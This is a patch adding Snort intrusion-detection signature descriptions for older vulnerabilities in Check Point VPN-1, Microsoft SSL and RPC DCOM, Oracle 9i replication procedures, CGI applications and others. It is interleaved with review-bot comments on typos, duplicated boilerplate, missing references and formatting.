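Review bot: Detailed Information for SID 1665 is generic boilerplate (repeated verbatim for SIDs 2569 and 1220 later in this patch) and never states what the rule matches, so an analyst cannot tell a traversal attempt from an overflow attempt from this text. Add one sentence naming the URI, parameter or content pattern the rule keys on, and reconsider "False Positives: None known" for a rule whose Attack Scenarios span "simple directory traversal to exploitation of buffer overflow conditions"; scanners and legitimate applications commonly trip content rules this broad.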
--- /dev/null
+++ b/doc/signatures/2377.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+2377
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Checkpoint VPN-1.
+
+--
+Impact:
+Unauthorized administrative access to Checkpoint VPN-1 systems
+
+--
+Detailed Information:
+Checkpoint VPN-1, SecuRemote and SecureClient contain an error that
+affects the processing of large Certificate requests to the VPN service.
+By sending a large amount of data in the Certificate Request payload an
+attacker may cause a buffer overflow condition to occur, presenting an
+opportunity to execute code of their choosing with the privileges of the
+user running the service, usually root.
+
+--
+Affected Systems:
+	CheckPoint Software FW-1 1.4.1 Service packs prior to SP6
+	CheckPoint Software FW-1 Next Generation FP1, FP0
+	CheckPoint Software VPN-1 1.4.1 SP5a
+	CheckPoint Software VPN-1 Next Generation FP1, FP0
+
+--
+Attack Scenarios:
+An attacker could supply a large Certificate Request payload containing
+code to be executed on the system.
+
+--
+Ease of Attack:
+Proof of concept code exists.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
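Review bot: Impact and Detailed Information disagree: Impact says "Unauthorized administrative access", while the body describes a buffer overflow yielding code execution as the service user, "usually root", so Impact should say remote code execution. In Affected Systems, "FW-1 1.4.1" and "VPN-1 1.4.1 SP5a" read like a transposition of "4.1"; verify against the Check Point advisory and cite it under the empty Additional References. "Ease of Attack: Proof of concept code exists." should also give a level (Moderate, for example) as the other files do.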
--- /dev/null
+++ b/doc/signatures/2522.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2522
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
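Review bot: This file is identical to 2532.txt later in this patch, so neither says what distinguishes SID 2522 from SID 2532; each should state which SSL-speaking service or port its rule inspects. "attcker" in Attack Scenarios should be "attacker", and "SSL requests containing an invalid field" should name the field the rule looks for, since that is what determines false positives against non-Microsoft SSL stacks.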
--- /dev/null
+++ b/doc/signatures/1833.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1833
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "naked lesbians".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "naked lesbians".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
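Review bot: The Summary sentence is ungrammatical: "a webpage was visited the included the content" should read "a webpage was visited that included the content". The Sid block has a stray blank line between "Sid:" and "1833", "Rule:" lacks the blank line the other files put before "--", and the file ends with seven empty "+" lines that should be trimmed. In False Positives, "etc.etc." adds nothing; list the cases or drop it. Since this is a content-policy rule rather than an attack signature, Corrective Action could note that the rule should simply be disabled where no such policy exists.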
--- /dev/null
+++ b/doc/signatures/3331.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3331
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
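Review bot: "Expoit" in Ease of Attack should be "Exploit". The Corrective Action port list (135, 139, 445 TCP and UDP) is narrower than the one in the LSASS file earlier in this patch, which also covers UDP 137/138, TCP 593 and the RPC ephemeral range; both concern the same RPC endpoint exposure and the lists should agree. Additional References is empty and should cite the Microsoft bulletin for the DCOM RPC vulnerability. Attack Scenarios ("an overly long filename via a network share") should make clear the name travels in the RPC request, as Detailed Information says, or a reader will expect an SMB rule.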
--- /dev/null
+++ b/doc/signatures/1805.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1805
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a flaw on a 
+server running Oracle reports.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A stack overflow exists in the Oracle Reports "rwcgi60" program. If a 
+user supplies a long string as a value for the method "setauth", it can 
+overflow the stack and may allow the user to run code on the server. 
+This code would be executed with the permissions of the web server.
+
+--
+Affected Systems:
+	Oracle's Oracle Reports6i 6.0.8
+	Oracle9i Application Server Reports 9.0.2
+
+--
+Attack Scenarios:
+An attacker can overflow the stack using a URL and cause the machine to 
+execute shell code.
+
+--
+Ease of Attack:
+Medium
+
+--
+False Positives: 
+None known.
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com> 
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/4848
+
+--
--- /dev/null
+++ b/doc/signatures/1700.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1700
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
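Review bot: "ona web server" in Detailed Information should be "on a web server". This is the same generic CGI boilerplate that reappears for SID 1649 and, padded further, for SID 100000482; nothing identifies the CGI program or request the rule matches, and "Ease of Attack: Simple. Exploits exist." cannot be checked for an unnamed application. Name the script and the matched pattern, or trim Impact and Detailed Information to what the rule can actually detect.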
--- /dev/null
+++ b/doc/signatures/417.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+417
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Information Request datagram.
+
+--
+
+Impact:
+ICMP Information Request datagrams attempt to locate the network number of the network segment the datagram was generated on.  This could be an indication of an improperly configured host attempting to locate the network number of the subnet it is located in.
+
+--
+
+Detailed Information:
+This message is generated when a host attempts to locate the network number of the network segment it is located on..  Hosts that generated ICMP Information Request Messages are attempting to obtain the network number of subnet it is on.  In normal situations the ICMP Code should be set to 0, values other than 0 are undefined and should never be used.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 15 datagrams are not normal network activity.  Hosts generating ICMP Information Request messages or Information Reply Messages should be checked for configuration errors.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
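Review bot: This file has no Affected Systems section, unlike every other document in the patch; add one (even "All", as 366.txt does). In Detailed Information, "located on.." has a doubled period and "Hosts that generated ICMP Information Request Messages" should be "Hosts that generate". Impact and Detailed Information state the same fact three times; one sentence that the request asks for the network number of the local segment, plus the note that a non-zero ICMP code is undefined, is enough. Ease of Attack says tools generate these datagrams while Attack Scenarios says "None known"; if the concern is reconnaissance or misconfiguration, say which in Attack Scenarios.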
--- /dev/null
+++ b/doc/signatures/366.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+366
+
+--
+Summary:
+ping is a standard networking utility that determines if a target host
+is up. This rule indicates that the ping originated from a host running
+Unix.
+
+--
+Impact:
+Information Disclosure. Ping can be used as a reconnaissance tool.
+
+--
+Detailed Information:
+ping sends an ICMP Echo Request packet to an IP address.  If a host is
+up at that address it will reply with an ICMP Echo Reply.  The reply
+includes the data portion of the echo packet.  The data included in the
+Echo Request varies across different operating system implementations.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker will often ping a machine to make sure it is up before
+attacking.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+This program is also used legitimately by users and/or network
+administrators to troubleshoot problems.  It is possible to emulate this
+ping signature using another ping utility.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+ICMP packets can be blocked with a packet filtering firewall.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+
+--
+Additional References:
+
+--
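Review bot: The Summary says the rule identifies a ping "from a host running Unix", but neither it nor Detailed Information states what in the Echo Request payload is Unix-specific, which is the one fact an analyst needs when judging whether the False Positives note (the signature can be emulated) applies; add the payload characteristic the rule matches. Corrective Action "ICMP packets can be blocked" is broader than the rule warrants; filtering inbound Echo Requests at the perimeter is the relevant control, and blocking all ICMP also breaks path MTU discovery.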
--- /dev/null
+++ b/doc/signatures/2873.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2873
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_nvarchar2
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
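Review bot: The procedure name in Detailed Information is broken across lines so the sentence reads "alter_priority_nvarchar2" then ". This procedure"; join it onto one line. "Oracle Oracle9i" in Affected Systems should be "Oracle 9i". Ease of Attack "Simple." omits the precondition that 2648.txt states for the same family of dbms_repcat overflows, namely that the attacker must already hold valid database credentials; add it here (and in 2746.txt and 2818.txt), since it changes how an alert on this SID is triaged.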
--- /dev/null
+++ b/doc/signatures/2532.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2532
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
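Review bot: Duplicate of 2522.txt; every line, including the "attcker" typo, is identical. If the two SIDs cover different ports or services, each file should say which; if they cover the same condition, one should reference the other instead of repeating the text.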
--- /dev/null
+++ b/doc/signatures/2648.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2648
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "instantiate_online" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "refresh_template_name"
+variable to cause the overflow. The result could permit the attacker
+to gain escalated privileges and run code of their choosing. This
+attack requires an attacker to logon to the database with a valid
+username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck631.html
+
+--
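Review bot: "a Oracle database" in Summary should be "an Oracle database". The $ORACLE_PORTS note in Detailed Information is a sensor configuration instruction, not a description of the vulnerability, and reads as if setting the variable were part of the flaw; move it to its own paragraph or into the rule comment. Unlike 2873/2746/2818, the package containing "instantiate_online" is not named; add it, and introduce "refresh_template_name" in Detailed Information rather than only in Attack Scenarios. Ease of Attack "Simple." should be qualified by the valid-credentials requirement the file itself states two sections later.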
--- /dev/null
+++ b/doc/signatures/310.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid: 310
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability in SmartMax MailMax mailserver.
+
+--
+Impact:
+Serious. Execution of arbitrary code on the target server is possible.
+
+--
+Detailed Information:
+MailMax is an email server for Windows platforms. Certain versions of the software contain a vulnerability that can allow execution of arbitrary code on the server with the privileges of the user running MailMax.
+
+Affected Versions:
+	MailMax 1.0
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2312
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0404
+
+--
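Review bot: Structure differs from the other files: "Affected Versions:" is embedded in Detailed Information without the "--" separator and the standard "Affected Systems:" heading, and "Sid: 310" is on one line where the others put the number on its own line. Attack Scenarios ("Exploit scripts are available") restates Ease of Attack instead of describing a scenario; Detailed Information should say which MailMax command or input overflows, since that is what the rule must be matching.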
--- /dev/null
+++ b/doc/signatures/100000482.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000482
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "BoastMachine" application running on a webserver. 
+Access to the file "vote.php" using a remote file being passed as the "bmc_dir" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "bmc_dir" parameter in the "vote.php" script used by the 
+"BoastMachine" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BoastMachine
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
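Review bot: The third paragraph of Detailed Information and all of Attack Scenarios are the generic CGI credential-validation boilerplate from 1700.txt and do not describe a remote file include through "bmc_dir"; the scenario here is an attacker passing a URL in that parameter so that "vote.php" includes and executes attacker-hosted PHP, and the text should say so. Also: "ona web server" should be "on a web server", Affected Systems should list BoastMachine versions rather than "All systems running CGI applications using BoastMachine", and the blank line before "--" is missing after the Sid, Affected Systems and Contributors blocks.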
--- /dev/null
+++ b/doc/signatures/2746.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2746
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure revoke_surrogate_repcat
+. This procedure is included in
+dbms_repcat_auth.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
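Review bot: Same presentation problems as 2873.txt: the procedure name "revoke_surrogate_repcat" is split from its following period across a line break, and Affected Systems reads "Oracle Oracle9i". The package is given as "dbms_repcat_auth" without the "sys." schema prefix used in the other two dbms_repcat files; pick one convention. Ease of Attack should carry the valid-database-login precondition stated in 2648.txt.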
--- /dev/null
+++ b/doc/signatures/1285.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1285
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
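Review bot: "Impact: Information gathering possible administrator access." needs punctuation ("Information gathering; possible administrator access."). The body never names the file or path the rule matches, so "exploit a potential weakness" is unverifiable for the reader; state the resource, since the Corrective Action ("deny access to sensitive files") depends on it. Minor: "Sid: 1285" is inline with two blank lines after it, and Additional References has two blank lines before the closing "--".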
--- /dev/null
+++ b/doc/signatures/100000141.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+100000141
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+directory traversal associated with Imail Web Calendaring
+servicel
+
+--
+Impact:
+A successful attack can permit a user to navigate outside
+of the web root directory and read files.
+
+--
+Detailed Information:
+The Imail Web Calendaring Server does not properly sanitize
+a malformed URL that contains directory traversal characters.
+This vulnerability is associated with static objects identified
+by names ending in .jsp, .jpg, .gif, .wav, .css, or .htm.  This
+can permit an unauthorized user to examine files that may contain
+sensitive information.
+
+--
+Affected Systems:
+Ipswitch IMail Server 8.2 and prior
+Ipswitch IMail Server 8.15 and prior
+
+--
+Attack Scenarios:
+An attacker send a URI containing a directory traversal to view
+sensitive files on a vulnerable server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+Other:
+
+--
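Review bot: Summary ends in "servicel" (typo for "service" plus a missing period). Affected Systems lists "8.2 and prior" and "8.15 and prior" without saying how the two relate; under the usual minor-version reading 8.15 is later than 8.2 and the second line subsumes the first, so state the branches explicitly. "An attacker send a URI" should be "sends". The "Additional References" heading lacks its colon and the "Other:" entry is empty; supply the vendor advisory or remove the empty label.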
--- /dev/null
+++ b/doc/signatures/1649.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1649
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
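Review bot: Identical to 1700.txt, including the "ona web server" typo; see the note there. Two SIDs sharing one description give an analyst no way to tell which CGI program each rule matches.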
--- /dev/null
+++ b/doc/signatures/2818.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2818
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_columns_to_flavor
+. This procedure is included in
+sys.dbms_repcat_fla_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
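Review bot: Same issues as 2873.txt and 2746.txt: "add_columns_to_flavor" is split from its period across a line break, "Oracle Oracle9i" should be "Oracle 9i", and Ease of Attack omits the valid-credentials precondition from 2648.txt. Three files in this patch share this text; a single corrected template would avoid fixing it three times.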
--- /dev/null
+++ b/doc/signatures/2367.txt
@@ -0,0 +1,62 @@
